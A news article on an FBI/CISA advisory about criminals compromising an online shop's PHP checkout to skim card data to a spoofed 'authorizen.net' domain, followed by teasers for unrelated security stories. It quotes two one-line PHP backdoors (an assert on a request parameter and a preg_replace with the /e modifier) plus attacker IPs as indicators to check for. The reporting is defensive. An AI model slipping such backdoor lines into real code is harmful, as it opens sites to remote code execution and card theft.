How these crooks backdoor online shops and siphon victims' credit card info

FBI and co blow lid off latest PHP tampering scam


The FBI and its friends have warned businesses of crooks scraping people's credit-card details from tampered payment pages on compromised websites.

It's an age-old problem: someone breaks into your online store and alters the code so that as your customers enter their info, copies of their data is siphoned to fraudsters to exploit. The Feds this week have detailed one such effort that reared its head lately.

As early as September 2020, we're told, miscreants compromised at least one American company's vulnerable website from three IP addresses: 80[.]249.207.19, 80[.]82.64.211 and 80[.]249.206.197. The intruders modified the web script TempOrders.php in an attempt to inject malicious code into the checkout.php page.

In an advisory [PDF] from the FBI, and Uncle Sam's CISA and Homeland Security, from January 2022, code was injected into the checkout page to scrape customers' payment details and send it all to a server the crooks controlled that masqueraded as a legitimate card processing system.

As the FBI explained:

The malicious code posts the customer's payment information to a spoofed card processing domain, http://authorizen[.]net/, where the 'n' is added to impersonate or spoof http://authorize[.]net/, a legitimate card processing company's domain.

What's more, the crooks modified files on the infiltrated website's server to install two backdoors. One of these backdoors was a standard web shell – a page that executes commands on the remote system – which was deployed by including the statement assert($_REQUEST['login']) in a PHP page. This statement was exploited by visiting the tampered page with the login URL parameter set to code that fetched and installed the web shell.

The miscreants also slipped in code – @preg_replace("/f/e",$_GET['u'],"fengjiao") – that appears to process a regular expression, and can be exploited to execute code supplied in a URL parameter. Both of these code modifications were used to sneak the PHP web shells P.A.S. and b374 onto the victim's server for further nefarious purposes.

You may want to check the above strings aren't present into your site's PHP source code, and that you haven't a record of the IP addresses in your logs. The FBI also recommends several measures to make your systems less of an easy target for criminals. 

These include regular patching and software updates, changing default login credentials, segmenting network systems to prevent lateral movement, monitoring traffic in your e-commerce environment to identify potential malicious activity, and actively scanning web logs and apps for unauthorized access and abnormal behavior. 

Of course, criminals aren't the only ones with a penchant for scraping data. 

Tracking, marketing, and analytics firms have been exfiltrating the email addresses — and occasionally passwords — of internet users from web forms prior to submission and without user consent, according to researchers.

In a paper scheduled to appear at the Usenix '22 security conference later this year, authors Asuman Senol (imec-COSIC, KU Leuven), Gunes Acar (Radboud University), Mathias Humbert (University of Lausanne) and Frederik Zuiderveen Borgesius, (Radboud University) described how they measured data handling in web forms on the top 100,000 websites, as ranked by research site Tranco. ®


Other stories you might like

  • LGBTQ+ folks warned of dating app extortion scams
    Uncle Sam tells of crooks exploiting Pride Month

    The FTC is warning members of the LGBTQ+ community about online extortion via dating apps such as Grindr and Feeld.

    According to the American watchdog, a common scam involves a fraudster posing as a potential romantic partner on one of the apps. The cybercriminal sends explicit of a stranger photos while posing as them, and asks for similar ones in return from the mark. If the victim sends photos, the extortionist demands a payment – usually in the form of gift cards – or threatens to share the photos on the chat to the victim's family members, friends, or employer.

    Such sextortion scams have been going on for years in one form or another, even attempting to hit Reg hacks, and has led to suicides.

    Continue reading
  • Google: How we tackled this iPhone, Android spyware
    Watching people's every move and collecting their info – not on our watch, says web ads giant

    Spyware developed by Italian firm RCS Labs was used to target cellphones in Italy and Kazakhstan — in some cases with an assist from the victims' cellular network providers, according to Google's Threat Analysis Group (TAG).

    RCS Labs customers include law-enforcement agencies worldwide, according to the vendor's website. It's one of more than 30 outfits Google researchers are tracking that sell exploits or surveillance capabilities to government-backed groups. And we're told this particular spyware runs on both iOS and Android phones.

    We understand this particular campaign of espionage involving RCS's spyware was documented last week by Lookout, which dubbed the toolkit "Hermit." We're told it is potentially capable of spying on the victims' chat apps, camera and microphone, contacts book and calendars, browser, and clipboard, and beam that info back to base. It's said that Italian authorities have used this tool in tackling corruption cases, and the Kazakh government has had its hands on it, too.

    Continue reading
  • Never fear, the White House is here to tackle web trolls
    'No one should have to endure abuse just because they are attempting to participate in society'

    A US task force aims to prevent online harassment and abuse, with a specific focus on protecting women, girls and LGBTQI+ individuals.

    In the next 180 days, the White House Task Force to Address Online Harassment and Abuse will, among other things, draft a blueprint on a "whole-of-government approach" to stopping "technology-facilitated, gender-based violence." 

    A year after submitting the blueprint, the group will provide additional recommendations that federal and state agencies, service providers, technology companies, schools and other organisations should take to prevent online harassment, which VP Kamala Harris noted often spills over into physical violence, including self-harm and suicide for victims of cyberstalking as well mass shootings.

    Continue reading

Biting the hand that feeds IT © 1998–2022